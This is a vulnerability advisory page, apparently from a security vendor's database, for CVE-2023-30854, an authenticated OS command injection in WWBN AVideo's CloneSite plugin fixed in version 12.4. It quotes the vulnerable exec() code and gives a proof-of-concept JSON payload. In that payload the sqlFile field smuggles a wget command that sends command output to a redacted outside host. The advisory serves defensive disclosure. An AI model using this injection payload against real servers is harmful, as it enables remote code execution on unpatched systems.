8.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-30854

GHSA ID

GHSA-6vrj-ph27-qfp3

EPSS Score

0.98028%

CWE

CWE-78

Published

4/27/2023

Updated

11/4/2023

KEV Status

Technology

PHP

Concerned about an active attack path?

Talk to our security experts and see Miggo in action.

Miggo Vulnerability Database

→

CVE-2023-30854

CVE-2023-30854: Remote code injection in wwbn/avideo

WWBN Avideo Authenticated RCE - OS Command Injection

Description

An OS Command Injection vulnerability in an Authenticated endpoint /plugin/CloneSite/cloneClient.json.php allows attackers to achieve Remote Code Execution.

Vulnerable code:

$cmd = "wget -O {$clonesDir}{$json->sqlFile} {$objClone->cloneSiteURL}videos/cache/clones/{$json->sqlFile}";
$log->add("Clone (2 of {$totalSteps}): Geting MySQL Dump file");
exec($cmd . " 2>&1", $output, $return_val);

We can control $objClone->cloneSiteURL through the admin panel clone site feature.

/plugin/CloneSite/cloneClient.json.php sends a GET Request to {$objClone->cloneSiteURL}/plugin/CloneSite/cloneServer.json.php. I hosted a specially crafted cloneServer.json.php that prints the following JSON data

{"error":false,"msg":"","url":"https:\/\/REDACTED/\/","key":"REDACTED","useRsync":1,"videosDir":"\/var\/www\/html\/[demo.avideo.com](http://demo.avideo.com/)\/videos\/","sqlFile":"Clone_mysqlDump_644ab263e62d6.sql; wget [http://REDACTED:4444/`pwd`](http://redacted:4444/pwd) ;#","videoFiles":[],"photoFiles":[]}

Send a GET Request to /plugin/CloneSite/cloneClient.json.php then remote code execution is achieved.

rce

(GitHub Advisory)

8.8

CVSS Score

3.1

Basic Information

CVE ID

CVE-2023-30854

GHSA ID

GHSA-6vrj-ph27-qfp3

EPSS Score

0.98028%

CWE

CWE-78

Published

4/27/2023

Updated

11/4/2023

KEV Status

Technology

PHP

Technical Details

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Package Name	Ecosystem	Vulnerable Versions	First Patched Version
wwbn/avideo	composer	< 12.4	12.4

Vulnerability Intelligence
Miggo AI

Root Cause Analysis

The vulnerability occurs in the code where the $cmd variable is built using user-controlled $objClone->cloneSiteURL and $json->sqlFile. These values are not sanitized before being passed to exec(), allowing command injection. The patch adds escaping (escapeshellarg) and regex filtering to $json->sqlFile, confirming the lack of sanitization was the root cause. The direct use of unsanitized user input in an OS command execution context (via exec()) makes this function clearly vulnerable.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

# WW*N *vi**o *ut**nti**t** R** - OS *omm*n* Inj**tion ## **s*ription *n OS *omm*n* Inj**tion vuln*r**ility in *n *ut**nti**t** *n*point `/plu*in/*lon*Sit*/*lon**li*nt.json.p*p` *llows *tt**k*rs to ***i*v* R*mot* *o** *x**ution. Vuln*r**l* *o**:

Reasoning

T** vuln*r**ility o**urs in t** *o** w**r* t** $*m* v*ri**l* is *uilt usin* us*r-*ontroll** `$o*j*lon*->*lon*Sit*URL` *n* `$json->sql*il*`. T**s* v*lu*s *r* not s*nitiz** ***or* **in* p*ss** to `*x**()`, *llowin* *omm*n* inj**tion. T** p*t** ***s *s*

8.8

Basic Information

Concerned about an active attack path?

CVE-2023-30854: Remote code injection in wwbn/avideo

WWBN Avideo Authenticated RCE - OS Command Injection

Description

8.8

Basic Information

Technical Details

Vulnerability IntelligenceMiggo AI

Root Cause Analysis

Vulnerable functions

WAF Protection Rules

WAF Rule

Reasoning

Vulnerability Intelligence
Miggo AI